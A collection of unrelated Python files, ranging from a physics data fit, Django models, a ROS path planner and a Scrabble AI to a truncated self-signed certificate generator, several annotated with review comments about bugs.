POTASSIUM_WORK_FUNCTION = 3.67E-19 # [J]
# frequency axis for the fitted/model curves, in THz
frequencies = np.linspace(100, 300, num=600)
# Filter measurements
yerrors = [0.96, 0.81, 0.29]  # stopping-potential uncertainties [V]
stopping_pontentials = np.array([1.23, 0.88, 0.56])  # [V]
filter_frequencies = np.array([274E12, 229E12, 172E12])  # [Hz]
filter_data_points = [filter_frequencies, stopping_pontentials]
# Linear fit V = slope*f + intercept; with cov=True the second return value
# is the covariance matrix of the fitted coefficients.
coefficients, residuals = np.polyfit(filter_data_points[0],
                                     filter_data_points[1],
                                     deg=1, cov=True)
slope = coefficients[0]*1E12  # convert slope from V/Hz to V/THz
# NOTE(review): parameter uncertainties are conventionally the sqrt of the
# covariance diagonal, not the raw diagonal entries -- confirm before
# quoting these errors.
slope_uncertainty = np.abs(residuals[0][0])
intercept = coefficients[1]
intercept_uncertainty = np.abs(residuals[1][1])
observed = slope*frequencies + intercept
model_slope = (PLANCK_CONST*1E12/CHARGE_E)
# NOTE(review): POTASSIUM_WORK_FUNCTION is declared in joules, so the extra
# EV_TO_JOULES factor here looks like a double unit conversion -- confirm.
model_intercept = (POTASSIUM_WORK_FUNCTION*EV_TO_JOULES*1E12/CHARGE_E)
photoelectric_model = model_slope*frequencies - model_intercept
work_function_prediction = intercept * -CHARGE_E * JOULE_TO_EV
work_function_prediction_uncertainty = intercept_uncertainty * \
    CHARGE_E * JOULE_TO_EV
plancks_const_prediction = coefficients[0] * CHARGE_E
plancks_const_uncertainty = slope_uncertainty
# NOTE(review): the next two bare expressions are no-ops outside a notebook.
plancks_const_prediction
plancks_const_uncertainty
# Plot data points and the linear fit against the model curve
fig, ax = plt.subplots()
ax.plot(frequencies, observed, label="Observed fit", linestyle="--")
ax.errorbar(filter_frequencies*1E-12, stopping_pontentials,
            yerr=[yerrors, yerrors], fmt='o', label="Stopping potentials")
ax.plot(frequencies, photoelectric_model, label="Actual")
ax.set(title="Stopping Voltage vs. Frequency",
       xlabel="Frequency (THz)",
       ylabel="Voltage (V)")
ax.legend(loc='upper left')
plt.grid(True)
fig.savefig('plots/observation_vs_model.png')
fig.show()
|
from django.db import models
# Create your models here.
class Mentee(models.Model):
    """A mentee profile: name, testimonial text, and a photo."""
    nama_mentee = models.CharField(max_length = 255)
    testimoni = models.CharField(max_length = 300)
    # foto_mentee = models.CharField(max_length = 300)
    foto_mentee = models.ImageField(upload_to = 'upload')  # stored under MEDIA_ROOT/upload

    def __str__(self):
        # Display mentees by name in the admin and shell
        return self.nama_mentee
# TODO: package this
# 2D-list basics demo.
i = [[1,2,3],[4,5,6],[7,8,9]]
i[0][0]  # bare expression: has no effect outside a REPL
print(i[0][0])
# go to first list and grab first item of that list
j = []
for x in range(10):
    j.append(0)
print(j)
# Same list of ten zeros, built by repetition
j = [0] * 10
print(j)
# Build a 10x10 grid with a loop; a fresh [0]*10 each iteration avoids
# rows aliasing one another
j = []
for x in range(10):
    k = [0]*10
    j.append(k)
print(j)
# Same grid via a comprehension ([[0]*10]*10 would alias one row ten times!)
j = [[0]*10 for x in range(10)]
print(j)
for x in range(len(j)):
    print(*j[x]) # * unpacks the row into print's arguments (no brackets/commas)
#!/usr/bin/env python
import rospy
import tf
import math
import numpy as np
import matplotlib.pyplot as plt
from ga.gasearch import GASearch
from aStar.aStarSearch import aStar
from nav_msgs.msg import OccupancyGrid, MapMetaData
from sensor_msgs.msg import PointCloud
from geometry_msgs.msg import Point32, Point
# Global Variables
path_pub = None  # publisher for the computed path; set in main()
# set True for GA or False for A*
RUN_GA = True
# Enable debug Viz
DEBUG = True
# robot's current position
cur_pos = None
# 2D array occupancy grid, 0 = empty and anything else (should be set to 1) is occupied
space = None
# Reorientation factor to account for map not aligning with robot initial heading
# (scale, origin_x, origin_y, origin_theta)
reorient_vector = (1, 0, 0)
width = 0
height = 0
# shared GA searcher; its world grid is refreshed on every map update
searchy = GASearch(population_size=500)
def receive_cur_pos(position):
    """ROS callback: cache the robot's latest position as an (x, y) tuple."""
    global cur_pos
    x, y = position.x, position.y
    cur_pos = (x, y)
def map_update(ogrid):
    """Occupancy-grid callback: cache a binarised (0/1) grid and pass it to
    the GA searcher.

    Also records the map resolution and origin in ``reorient_vector`` for
    the world<->grid coordinate conversions.
    """
    global space, reorient_vector, height, width
    info = ogrid.info
    # ROS delivers the grid as a flat row-major array
    space = np.reshape(ogrid.data, (info.height, info.width))
    space = np.transpose(space)
    space[space != 0] = 1  # collapse all occupied/unknown values to 1
    width = info.width
    height = info.height
    reorient_vector = (
        info.resolution, info.origin.position.x, info.origin.position.y)
    searchy.set_world(space)
    print("reorient_vector", reorient_vector)
def world_point_to_grid(pt, scale=1):
    """Convert a world-frame (x, y) point into (row, col) grid indices.

    Uses the map resolution and origin cached in ``reorient_vector``.
    """
    resolution, origin_x, origin_y = reorient_vector
    grid_x = ((pt[0] - origin_x) / resolution) * scale
    grid_y = ((pt[1] - origin_y) / resolution) * scale
    # grid indexing is (row, col) == (y, x)
    return (int(grid_y), int(grid_x))
def grid_point_to_world(pt, scale=1):
    """Inverse of world_point_to_grid: (row, col) grid indices -> world (x, y)."""
    resolution, origin_x, origin_y = reorient_vector
    world_x = pt[1] / scale * resolution + origin_x
    world_y = pt[0] / scale * resolution + origin_y
    return (world_x, world_y)
# generation counter: the GA population is only initialised on the first call
gen = 0


def run_ga():
    """Run one batch of GA iterations and publish the path once collision-free."""
    global gen
    if space is None or cur_pos is None:
        return  # wait until both a map and a position have arrived
    # path should start at the robot's current position
    best_path = searchy.search(world_point_to_grid(cur_pos), (300, 400), iters=500, init_pop=(gen == 0))
    gen += 1
    if DEBUG:
        # live plot of the current best path over the occupancy grid
        plt.clf()
        plt.ion()
        plt.imshow(searchy.world, interpolation='none')
        for i in range(0, len(best_path.pts) - 1):
            pt1 = [best_path.pts[i][0], best_path.pts[i + 1][0]]
            pt2 = [best_path.pts[i][1], best_path.pts[i + 1][1]]
            plt.plot(pt1, pt2, marker='o', color='green')
        plt.title("gen: " + str(gen * 500))
        plt.draw()
        plt.show()
        plt.pause(0.00001)
    # if our path is complete
    if best_path.score < 1:
        # best_path is a list of points forming the path. send to planning_node.
        pathcloud = PointCloud()
        pathcloud.header.stamp = rospy.Time.now()
        pathcloud.points = []
        for path_pt in best_path.pts:
            point = Point32()
            point.x, point.y = grid_point_to_world(path_pt)
            pathcloud.points.append(point)
        path_pub.publish(pathcloud)
def run_astar():
    """Downscale the grid, run A*, and publish the resulting path."""
    if space is None or cur_pos is None:
        return  # wait until both a map and a position have arrived
    # Scaling: search a grid shrunk by this factor for speed
    scale = 5
    pos = world_point_to_grid(cur_pos)
    start = [pos[0]//scale, pos[1]//scale]
    goal = [300//scale, 400//scale]  # fixed goal, in scaled grid cells
    # run A* to create the path
    search = aStar(space, start, goal)
    search.convertSpace(space, scale)
    path = search.grid_astar()
    best_path = search.convert(path)
    search.display(start, best_path)
    # best_path is a list of points forming the path. send to planning_node.
    pathcloud = PointCloud()
    pathcloud.header.stamp = rospy.Time.now()
    pathcloud.points = []
    # include start point
    point = Point32()
    point.x, point.y = grid_point_to_world(start, scale)
    pathcloud.points.append(point)
    for path_pt in best_path:
        point = Point32()
        point.x, point.y = grid_point_to_world(path_pt, scale)
        pathcloud.points.append(point)
    path_pub.publish(pathcloud)
def main():
    """ROS node entry point: wire subscribers/publisher and loop the planner."""
    global path_pub
    # initialize node
    rospy.init_node('mapping_node', anonymous=True)
    # subscribe to the occupancy grid used as the planning space
    # use "/move_base/global_costmap/costmap" if slam works goodly
    map_sub = rospy.Subscriber("/move_base/global_costmap/costmap", OccupancyGrid, map_update, queue_size=1)
    # publish command to follow path
    path_pub = rospy.Publisher("/bb/path", PointCloud, queue_size=1)
    # subscribe to the robot's current position (use as start of path)
    pos_sub = rospy.Subscriber("/bb/pos", Point, receive_cur_pos, queue_size=1)
    rate = rospy.Rate(1) # 1Hz, doesn't really matter since it'll take longer.
    while not rospy.is_shutdown():
        # check whether we are using A* or GA to generate the path
        if RUN_GA:
            # run the GA to create the path
            run_ga()
        else:
            # run A* to create the path
            run_astar()
        rate.sleep()


if __name__ == '__main__':
    try:
        main()
    except rospy.ROSInterruptException:
        pass
|
import numpy as np
import helios

# Random test network: 1000 nodes with random 3-D positions and random edges.
networkSize = 1000;
positions = np.random.random((networkSize, 3));
# NOTE(review): np.random.randint's upper bound is exclusive, so
# high=networkSize-1 means node networkSize-1 never appears in an edge;
# high=networkSize was probably intended -- confirm.
edges = np.random.randint(0,networkSize-1,(networkSize, 2));
# helios.layout expects C-contiguous float32 positions/speeds and uint64 edges
positions = np.ascontiguousarray(positions,dtype=np.float32);
edges = np.ascontiguousarray(edges,dtype=np.uint64);
speeds = np.zeros(positions.shape,dtype=np.float32);
speeds = np.ascontiguousarray(speeds,dtype=np.float32);
# Run 100 layout iterations in place, then print the final positions.
for i in range(100):
    helios.layout(edges,positions,speeds);
print(positions);
|
# Generated by Django 2.1.5 on 2019-02-13 00:15
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Mentee table."""
    initial = True
    dependencies = [
    ]
    operations = [
        # Mentee stores a mentor's name, photo and two free-text fields.
        migrations.CreateModel(
            name='Mentee',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nama_mentor', models.CharField(max_length=255)),
                ('testimoni', models.CharField(max_length=300)),
                ('experience', models.CharField(max_length=300)),
                ('foto_mentor', models.ImageField(upload_to='upload')),
            ],
        ),
    ]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import heapq
def find_small_k_sums(alist, k):
    """Return the k smallest values of `alist` (in internal heap order),
    or None when the arguments are invalid (empty list, k < 0, k > len)."""
    negated_heap = []
    if not alist or k < 0 or k > len(alist):
        return
    # Track the k smallest values seen so far via a max-heap of negations:
    # the heap root is the largest of the current k smallest.
    for value in alist:
        negated = -value
        if len(negated_heap) < k:
            heapq.heappush(negated_heap, negated)
        else:
            # Push the candidate and evict the current maximum in one step.
            heapq.heappushpop(negated_heap, negated)
    # Undo the negation before returning.
    return [-negated for negated in negated_heap]
if __name__ == "__main__":
    # Demo: print the two smallest values of a sample list.
    sample = [0, 1, 4, 3, 5, 9, 2, 8, 6]
    smallest = find_small_k_sums(sample, 2)
    print(smallest)
# Presumably counts, modulo 10**9 + 7, the total number of "ABC" subsequences
# summed over every string obtainable by replacing each '?' in S with one of
# 'A'/'B'/'C' (each '?' not used by a subsequence contributes a factor of 3).
# TODO(review): confirm against the original problem statement.
S = input()
L = len(S)
Q = 10**9 + 7  # modulus
anum = [ 0 for _ in range(L+1)] # anum[i]: number of 'A' among the first i characters
cnum = [ 0 for _ in range(L+1)] # cnum[i]: number of 'C' among the first i characters
hnum = [ 0 for _ in range(L+1)] # hnum[i]: number of '?' among the first i characters
# Build the prefix counts in one pass over S.
for i in range(1,L+1):
    if S[i-1] == 'A':
        anum[i] = anum[i-1] + 1
        cnum[i] = cnum[i-1]
        hnum[i] = hnum[i-1]
    elif S[i-1] == 'B':
        anum[i] = anum[i-1]
        cnum[i] = cnum[i-1]
        hnum[i] = hnum[i-1]
    elif S[i-1] == 'C':
        anum[i] = anum[i-1]
        cnum[i] = cnum[i-1] + 1
        hnum[i] = hnum[i-1]
    else:
        anum[i] = anum[i-1]
        cnum[i] = cnum[i-1]
        hnum[i] = hnum[i-1] + 1
ans = 0
czen = cnum[L] # total number of 'C' in S
hzen = hnum[L] # total number of '?' in S
# Each position that is 'B' or '?' can act as the middle of "ABC":
# multiply the weighted ways to get an 'A' on its left by the weighted
# ways to get a 'C' on its right.
for i in range(1,L+1):
    if S[i-1] == 'B' or S[i-1] == '?':
        # Left: fixed 'A's times 3^(left '?'s), plus one left '?' chosen as 'A'
        # times 3^(remaining left '?'s).
        A = ((anum[i-1]*pow(3,hnum[i-1],Q))%Q + (hnum[i-1]*pow(3,max(0,hnum[i-1]-1),Q))%Q)%Q
        # Right: the symmetric computation using suffix counts of 'C' and '?'.
        C = (((czen - cnum[i])*pow(3,hzen - hnum[i],Q))%Q + ((hzen - hnum[i])*pow(3,max(0,hzen - hnum[i]-1),Q))%Q)%Q
        K = (A*C)%Q
        ans = (ans + K)%Q
print(int(ans))
|
import datetime
# Build a timestamp-based image filename, e.g. "13-45-7-123456.jpg".
now = datetime.datetime.now()
print(f"{now.hour}-{now.minute}-{now.second}-{now.microsecond}.jpg")
# Generated by Django 3.0.6 on 2020-06-10 08:23
from django.db import migrations, models
class Migration(migrations.Migration):
    """Converts item.item_Discount_pricse to a FloatField defaulting to 0.0."""
    dependencies = [
        ('Home', '0007_item_item_image'),
    ]
    operations = [
        migrations.AlterField(
            model_name='item',
            name='item_Discount_pricse',
            # NOTE(review): max_length has no effect on FloatField; kept only
            # to mirror the model definition.
            field=models.FloatField(default=0.0, max_length=30),
        ),
    ]
|
# This folder stores some global data.
|
import chainer
class Light:
    """Marker base class for all light types."""
    pass
class DirectionalLight(Light):
    """A light shining along a fixed direction."""

    def __init__(self, color, direction, backside=False):
        # Parameters are stored verbatim; no validation or copying is done.
        self.backside = backside
        self.direction = direction
        self.color = color
class AmbientLight(Light):
    """A uniform light characterised only by its color."""
    def __init__(self, color):
        self.color = color
class SpecularLight(Light):
    """A specular light with a per-entry shininess exponent `alpha`."""

    def __init__(self, color, alpha=None, backside=False):
        self.backside = backside
        self.color = color
        if alpha is None:
            # Default alpha: one float32 per leading entry of `color`, created
            # with the same array module (NumPy/CuPy) as `color` itself.
            xp = chainer.cuda.get_array_module(color)
            self.alpha = xp.ones(color.shape[0], 'float32')
        else:
            self.alpha = alpha
from django.utils.translation import ugettext_lazy as _
from rest_framework import permissions
from .models import UserProfile
# Public API of this permissions module.
__all__ = [
    'IsProfileOwner',
    'IsNotAuthenticated'
]
class IsProfileOwner(permissions.IsAuthenticated):
    """
    Restrict edit to owners only
    """
    message = _("Operation not allowed for insufficient permissions")

    def has_object_permission(self, request, view, obj=None):
        """Allow PUT/PATCH on an object only for the user that owns it."""
        # in edit request restrict permission to profile owner only
        if (request.method in ['PUT', 'PATCH']) and obj is not None:
            model = obj.__class__.__name__
            user_id = obj.id
            # A SocialLink belongs to a user; compare against its owner.
            if model == 'SocialLink':
                user_id = obj.user.id
            return request.user.id == user_id
        else:
            return True

    def has_permission(self, request, view):
        """ applies to social-link-list: only the profile owner may POST """
        if request.method == 'POST':
            # BUG FIX: this previously referenced the undefined name `Profile`
            # (NameError at runtime); the model imported above is UserProfile.
            user = UserProfile.objects.only('id', 'username').get(username=view.kwargs['username'])
            return request.user.id == user.id
        return True
class IsNotAuthenticated(permissions.IsAuthenticated):
    """
    Restrict access only to unauthenticated users.
    """
    message = _("You must not be authenticated to perform this operation")

    def has_permission(self, request, view, obj=None):
        """Grant access only when no authenticated user is attached."""
        return not (request.user and request.user.is_authenticated())
|
from collections import namedtuple
from multiprocessing.dummy import Pool
from .scrabble_box import Rulebook
from .exceptions import InvalidPlacementError
import sys
class Player(object):
    """Base class for a Scrabble player: holds the rack, score/word history,
    and the move-prompting flow shared by human and computer players."""
    def __init__(self, id, init_tiles, rulebook, name=None):
        # With no name supplied, prompt interactively until a non-blank one
        # is entered.
        while name is None:
            name = input("Enter the name for human {}: ".format(id))
            if name.isspace():
                print('Player names must contain non-space characters.')
                name = None
        self.name = name
        self.id = id
        """
        We'll save score and word histories. While a score history doesn't have any particular utility, it's more true
        to Scrabble tradition and style than just having the current score. Word histories are important to save
        so that analysis can be completed after the game is completed, possibly to tune the parameters of the AI in
        later incarnations.
        """
        self.score_hist = []
        self.word_hist = []
        self.tiles = init_tiles
        # The rulebook for scoring moves and other similar functions
        self.rulebook = rulebook
    def __str__(self):
        return self.name
    def get_move(self, board_state):
        """
        Abstract hook: subclasses decide the next move. Returns None here.
        :param board_state: A list of strings representing the currently played tiles on the scrabble board.
        :return: A namedtuple Move defined as ('Move', 'coords word dir')
        :rtype namedtuple
        """
        pass
    def prompt_move(self, board_state):
        """
        Ask the concrete player for a move and remove the consumed tiles.
        :param board_state: The current board
        :return: A Tuple containing the Move namedtuple the player is performing.
        """
        def remove_used_tiles(move):
            # Drop from the rack every tile this move consumes.
            coords, word, dir = move.coords, move.word, move.dir
            # If this is an exchange move, then we don't need to check the contents of the board.
            if coords == (-2, -2):
                for tile in move.word:
                    self.tiles.remove(tile)
            else:
                is_d, is_r = (dir == 'D', dir == 'R')
                y, x = coords
                for i, tile in enumerate(word.upper()):
                    # If the board is blank at this point, remove the tile from our tiles.
                    if board_state[y + i * is_d][x + i * is_r] == ' ':
                        # A letter we don't hold must have come from a blank.
                        if tile not in self.tiles and '?' in self.tiles:
                            tile = '?'
                        self.tiles.remove(tile)
        # Get the next move
        move = self.get_move(board_state)
        # Check for the skip signal (coords (-1, -1) means "skip turn")
        if move.coords != (-1, -1):
            # Remove the tiles from the bag.
            remove_used_tiles(move)
        return move
    def receive_tiles(self, new_tiles):
        """
        Recieve new tiles after a successfully played turn.
        :param new_tiles: A list of single-character strings representing the Tiles.
        :return: None
        """
        self.tiles += new_tiles
    def set_tiles(self, tiles):
        """
        Used for the Game Master to set the player's tiles for testing purposes.
        :param tiles: The list of single character strings representing the new tiles.
        :return: None
        """
        self.tiles = tiles
class HumanPlayer(Player):
    """
    This is a class for a human player to interact with the scrabble board directly, interacting with the
    Game Master through the command line/terminal interface.
    """
    def __init__(self, id, init_tiles, rulebook, name=None):
        Player.__init__(self, id, init_tiles, rulebook, name)

    def get_move(self, board_state):
        """
        Prompt the human on the terminal until a valid command/move is given.
        :param board_state: The current board
        :return: A move tuple representing the player's desired action.
        """
        def tiles_present_for_move(move):
            """
            Returns true if the human player has all of the tiles required to perform this action.
            :param move: namedtuple consisting of coordinates, direction, and word being played.
            :return: True if tiles required contained in self.tiles, false otherwise.
            """
            tile_copy = self.tiles.copy()
            is_d, is_r = (move.dir == 'D', move.dir == 'R')
            y, x = move.coords
            # Return false if the word doesn't fit here.
            if max(y+is_d*len(move.word), x+is_r*len(move.word)) > 14:
                return False
            for i, tile in enumerate(move.word.upper()):
                # If the board is blank at this point, remove the tile from our tiles.
                if move.coords == (-2, -2) or board_state[y + i * is_d][x + i * is_r] == ' ':
                    # A letter we don't hold may be covered by a blank ('?').
                    if tile not in self.tiles and '?' in self.tiles:
                        tile = '?'
                    try:
                        tile_copy.remove(tile)
                    except ValueError:
                        return False
            return True
        Move = namedtuple('move', 'coords dir word')
        print("Tiles: [" + str(self.tiles) + "]")
        while True:
            player_move = input("Action: ")
            move_segments = player_move.lower().strip().split(' ')
            # If only one word was entered, we check to see if it's one of the valid single-word commands.
            if len(move_segments) == 1:
                if move_segments[0] == 'skip':
                    return Move((-1, -1), '', '')
                elif move_segments[0] == 'quit':
                    return Move((-3, -3), '', '')
                elif move_segments[0] == 'help':
                    # BUG FIX: a comma was missing after "Commands:", so the first
                    # two help entries were fused onto one line.
                    print("\n".join(["Commands:", "'quit' quits the game", "'skip' skips a turn",
                                     "'exchange' <LETTERS> exchanges some of your tiles",
                                     "'define' <WORD> will define a word previously played",
                                     "'<X> <Y> <D or R> <WORD>' (e.g 7 7 R PYTHON) plays the word in the direction "
                                     "R for right (or D for down), starting at x, y, coordinates 7, 7"]))
                else:
                    print("Command {} not recognized.".format(move_segments[0]))
            # The only two-segment command which is valid is exchanging tiles.
            elif len(move_segments) == 2:
                if move_segments[0] == 'exchange':
                    if tiles_present_for_move(Move((-2, -2), '', move_segments[1].upper())):
                        return Move((-2, -2), '', move_segments[1])
                    else:
                        print("Tiles for this exchange are not present in your rack.")
                elif move_segments[0] == 'define':
                    print(self.rulebook.define(move_segments[1]))
            # Otherwise, we assume this is a regular move and attempt to process it.
            elif len(move_segments) == 4:
                x, y, direction, word = move_segments
                direction = direction.upper()
                # Coordinates are hexadecimal, so 0..14 fits one character (0-e).
                move = Move((int(y, 16), int(x, 16)), direction, word.upper())
                # BUG FIX: the original tested coords[0] < 0 and coords[1] > 14
                # twice each, so coords[0] > 14 and coords[1] < 0 slipped through.
                if move.coords[0] < 0 or move.coords[0] > 14 or move.coords[1] < 0 or move.coords[1] > 14:
                    print('Moves must be within the boundaries 0 and d (d being hexadecimal 14)')
                elif direction != 'D' and direction != 'R':
                    print('direction argument in format <x> <y> <dir> <tiles> must be D or R, not ' + direction)
                else:
                    try:
                        # Check that we have all of the tiles we're attempting to play.
                        if not tiles_present_for_move(move):
                            print("The player's tile rack does not contain the tiles needed for this move.")
                        else:
                            if self.rulebook.score_move(move, board_state) < 0:
                                # BUG FIX: the implicit string concatenation lacked a
                                # separating space ("borderan existing").
                                print('This word, or an ancillary word formed, is invalid, or the word does not border'
                                      ' an existing tile on the board.')
                            else:
                                return move
                    # BUG FIX: previously printed the exception *class*; print the
                    # caught instance so its message is shown.
                    except InvalidPlacementError as placement_error:
                        print(placement_error)
            else:
                print("Command {} not recognized. Type 'help' for help".format(move_segments[0]))
class ComputerPlayer(Player):
    """
    Computer-Controlled Competitor
    """
    def __init__(self, id, init_tiles, rulebook, name=None):
        # Call the default constructor to set name and tiles
        Player.__init__(self, id, init_tiles, rulebook, name)
    def find_words(self, tiles=None, starting_branch=None, fixed_tiles=(), pos=0, min_length=2, max_length=15):
        """
        :param tiles: A list of single-characters representing the player's tiles.
        :param starting_branch: The starting branch in the dictionary tree which we'll be exploring
        :param fixed_tiles: A list of tuples containing a character and the zero-indexed position in the created word
            in which the tile must occur. For example, if the second letter of the word must be 'A' and the third
            letter of the word must be 'M', this variable would be [('A',1), ('M',2)].
        :param pos: The current position in the word.
        :param min_length: The shortest a generated word can be, dictated by the number of tiles until a played piece
            borders an existing piece on the board.
        :param max_length: The longest a generated word can be, dictated by the coordinates on which the first tile
            will be placed.
        :return: A list of valid words which can be formed using the tiles in the rack and with the mandated positions
            of the tiles given.
        """
        if pos > max_length:
            return []
        if tiles is None:
            tiles = self.tiles.copy()
        if starting_branch is None:
            starting_branch = self.rulebook.dictionary_root
        # Sanity check: fixed tiles must be in strictly increasing positions.
        assert (len(fixed_tiles) == 1 or
                all([fixed_tiles[i][1] < fixed_tiles[i + 1][1] for i in range(len(fixed_tiles) - 1)]))
        """
        If the word at our current branch is valid, then we'll return it as a possible valid word, but only if there
        aren't required tiles upcoming which would directly attach to this word. For example, if we had the word at our
        current branch 'PIE' with fixed tile ('S', 3), we wouldn't have PIE be a valid word as the word which would
        actually be formed on the board is PIES, and it's much easier to check for that case now rather than appending
        trailing tiles to the board once it has been played.
        """
        # len(tiles) < len(self.tiles) ensures at least one rack tile was used.
        if starting_branch['VALID'] and len(starting_branch['WORD']) >= min_length and len(tiles) < len(self.tiles):
            if not fixed_tiles or fixed_tiles[0][1] > len(starting_branch['WORD']):
                valid_words = [starting_branch['WORD']]
            else:
                valid_words = []
        else:
            valid_words = []
        # If our current position features a mandated tile, then we check to see if that's a valid entry at this point
        # in the tree
        if fixed_tiles and fixed_tiles[0][1] == pos:
            if fixed_tiles[0][0] in starting_branch:
                valid_words += self.find_words(tiles=tiles,
                                               starting_branch=starting_branch[fixed_tiles[0][0]],
                                               fixed_tiles=fixed_tiles[1:],
                                               pos=pos + 1,
                                               min_length=min_length,
                                               max_length=max_length)
        else:
            # Casting tile to a set ensures we don't doubly traverse a branch in the case of repeated letters.
            for tile in set(tiles):
                new_tiles = tiles.copy()
                new_tiles.remove(tile)
                if tile == '?':
                    # In the case of blank tiles, we traverse every branch.
                    words_with_blanks = []
                    for key, value in starting_branch.items():
                        if key != 'VALID' and key != 'WORD':
                            words_with_blanks += self.find_words(tiles=new_tiles,
                                                                 starting_branch=starting_branch[key],
                                                                 pos=pos + 1,
                                                                 min_length=min_length,
                                                                 max_length=max_length,
                                                                 fixed_tiles=fixed_tiles)
                    # We lower the character replacing '?' to signify it being a former blank tile on the board.
                    words_with_blanks = [word[:pos] + word[pos].lower() + word[pos + 1:] for word in
                                         words_with_blanks]
                    valid_words += words_with_blanks
                else:
                    # Descend only if this letter continues a dictionary word.
                    if tile in starting_branch:
                        valid_words += self.find_words(tiles=new_tiles,
                                                       starting_branch=starting_branch[tile],
                                                       pos=pos + 1,
                                                       min_length=min_length,
                                                       max_length=max_length,
                                                       fixed_tiles=fixed_tiles)
        return valid_words
    def get_move_params(self, coords, direction, board_state):
        """
        Asserts that the number of tiles can be placed in the direction dir with the coordinates coords.
        Returns the (zero indexed) number of tiles until this becomes valid, and the ultimate length of the move.
        For example, if we're trying to place seven tiles across line '_ _ A _ _ _ _ _ _ _ _ _ _ _ _ ' from the first
        position, the result would be (2, 8, [(2, A)] as it becomes valid at tile 2 and the maximum number of
        letters in the result will be six.
        :param coords: y and x integer coordinates in tuple
        :param direction: string direction 'D' or 'R' for down or right.
        :param board_state: The list of strings currently representing the tiles played on the board.
        :return a tuple containing the minimum word length and the locations in the word of
            pre-placed tiles. A first element of -1 signals an invalid start square.
        :rtype tuple (int, list)
        """
        def is_island(y, x):
            """
            Checks to see if the given coordinate is an island in scrabble terms, meaning that there is no tile
            directly above, below, to the left, or to the right of it, though diagonals are of course still valid.
            :param y: Integer Y coordinate
            :param x: Integer X coordinate
            :return: True if the coordinates has no existing tile on any side.
            """
            # All first moves will be an island, but we'll of return false so the game can begin.
            if (y, x) == (7, 7):
                return False
            min_x, max_x = max(x - 1, 0), min(x + 1, 14)
            min_y, max_y = max(y - 1, 0), min(y + 1, 14)
            for near_y in range(min_y, max_y + 1):
                if board_state[near_y][x] != ' ':
                    return False
            for near_x in range(min_x, max_x + 1):
                if board_state[y][near_x] != ' ':
                    return False
            return True
        # TODO: remove assertions used in testing
        assert (direction == 'D' or direction == 'R')
        start_y, start_x = coords
        y, x = coords
        fixed_tiles = []
        tiles_rem = len(self.tiles)
        tiles_to_validity = -1
        if direction == 'D':
            """
            If the direction is down, then we first check that there is no tile played directly above us, as if that is
            the case then we'd be far better to calculate from that point rather than to allow a move to be formulated
            here and only later check if it aligns with the leading tile.
            """
            if y > 0 and board_state[y-1][x] != ' ':
                return -1, []
            # Walk down while we still have tiles or are crossing played tiles.
            while y < 15 and (tiles_rem or board_state[y][x] != ' '):
                if tiles_to_validity == -1:
                    if not is_island(y, x):
                        tiles_to_validity = y - start_y + 1
                if board_state[y][x] == ' ':
                    tiles_rem -= 1
                else:
                    fixed_tiles.append((board_state[y][x], y - start_y))
                y += 1
            return tiles_to_validity, fixed_tiles
        else:
            """
            Similarly, if going right we first check there's no tile to our immediate left.
            """
            if x > 0 and board_state[y][x-1] != ' ':
                return -1, []
            while x < 15 and (tiles_rem or board_state[y][x] != ' '):
                if tiles_to_validity == -1:
                    if not is_island(y, x):
                        tiles_to_validity = x - start_x + 1
                if board_state[y][x] == ' ':
                    tiles_rem -= 1
                else:
                    fixed_tiles.append((board_state[y][x], x - start_x))
                x += 1
            return tiles_to_validity, fixed_tiles
    def get_valid_locations(self, board_state):
        """
        :return: A list of "MoveParam" named tuples, containing the coordinates, orientation, min word length
            and max word length for perspective moves.
        """
        MoveParam = namedtuple('MoveParam', 'coords dir min max fixed')
        valid_move_params = []
        # Try every square in both orientations; keep the feasible starts.
        for y in range(15):
            for x in range(15):
                for direction in ['D', 'R']:
                    min_len, fixed_tiles = self.get_move_params((y, x), direction, board_state)
                    if min_len != -1:
                        if direction == 'D':
                            valid_move_params.append(MoveParam((y, x), direction, min_len, 15-y, fixed_tiles))
                        else:
                            valid_move_params.append(MoveParam((y, x), direction, min_len, 15-x, fixed_tiles))
        return valid_move_params
    def get_move(self, board_state):
        """
        First, we look at all the positions on the board and determine which coordinates can be the starting position
        for a word, the minimum length of a word which adheres to the placement rules of scrabble, and the maximum
        length of a word formed this point.
        """
        valid_locations = self.get_valid_locations(board_state)
        """
        Knowing where we can place words and how long the words can be moved, as well as what tiles this move would
        be forced to incorporate, we can find what valid words we can play.
        """
        Move = namedtuple('move', 'coords dir word')
        valid_moves = []
        for vl in valid_locations:
            valid_words = self.find_words(fixed_tiles=vl.fixed, min_length=max(2, vl.min), max_length=vl.max)
            valid_moves += [Move(vl.coords, vl.dir, word) for word in valid_words]
        # Now we score our prospective moves, and remove the invalid ones.
        move_scores = [(move, self.move_heuristic(move, board_state)) for move in valid_moves]
        move_scores = sorted(move_scores, key=lambda x: x[1], reverse=True)
        # Play the highest-scoring legal move, recording word and score history.
        if move_scores and move_scores[0][1] > 0:
            self.word_hist.append(move_scores[0][0].word)
            self.score_hist.append(move_scores[0][1])
            return move_scores[0][0]
        else:
            # If no legal moves are available, we send the skip signal which is coordinates of -1, -1
            return Move((-1, -1), '', '')
    def move_heuristic(self, move, board_state):
        """
        Return a positive value representing the current value of a move, or -1 if the move is impossible.
        TODO: GA Approach to heuristic.
        """
        return self.rulebook.score_move(move, board_state)
|
#!/usr/bin/python
from OpenSSL import crypto, SSL
from os.path import exists, join
CERT_FILE = 'cert.crt'
KEY_FILE = 'cert.key'
#print CERT_FILE
#print KEY_FILE
def create_self_signed_cert(cert_dir):
    """
    If cert.crt and cert.key don't exist in cert_dir, create a new
    self-signed cert and keypair and write them into that directory.
    """
    # BUG FIX: the original tested CERT_FILE twice, so a missing KEY_FILE
    # alone would never trigger regeneration.
    if not exists(join(cert_dir, CERT_FILE)) or not exists(join(cert_dir, KEY_FILE)):
        # create a key pair
        k = crypto.PKey()
        k.generate_key(crypto.TYPE_RSA, 1024)
        # create a self-signed cert
        cert = crypto.X509()
        cert.get_subject().C = "IN"
        cert.get_subject().ST = "AP"
        cert.get_subject().L = "HYDERABAD"
        cert.get_subject().O = "Nexiilabs"
        cert.get_subject().OU = "DEVOPS"
        # cert.get_subject().CN = CN
        cert.set_issuer(cert.get_subject())
        cert.set_pubkey(k)
        # NOTE(review): no serial number or validity period is set (matches the
        # original behaviour); some TLS clients may reject such a certificate.
